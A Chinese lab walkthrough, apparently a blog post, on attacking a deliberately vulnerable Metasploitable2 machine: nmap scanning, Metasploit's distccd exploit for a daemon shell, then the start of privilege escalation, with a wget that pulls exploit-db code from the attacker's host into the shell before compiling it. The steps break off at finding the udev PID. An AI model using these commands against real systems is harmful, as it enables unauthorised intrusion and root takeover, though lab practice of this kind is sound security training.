利用本地漏洞提升权限

环境:
kali:192.168.43.131
metasploitables2:192.168.43.132

利用的是meta2上的distccd服务的漏洞,以下将metaspolitables2简称为tb2

步骤:
1、先用nmap扫一下td2的端口(服务):
nmap -p- 192.168.43.132
2、发现distccd服务,打开msf,搜一下有没有该服务的漏洞利用程序:
msfconsole
search distccd
3、发现有一个:exploit/unix/misc/distcc_exec
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.43.132
exploit

4、发现成功进入tb2,看下权限,发现是daemon权限:
whoami
...

5、提权
下载提升权限的exploit:www.exploit-db.com/exploits/8572
下载后将文件放到/var/www/html文件下,开启apache2服务:service apache2 start

先使用之前用msf得到的那个daemon权限的shell,来下载我们的提权exploit:
wget “http://192.168.43.131/8572.c”
然后编译一下:gcc 8572.c -o 8572

看一下exploit需要的参数,发现需要udevd netlink socket的PID,查一下:
ps aux|grep udev

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值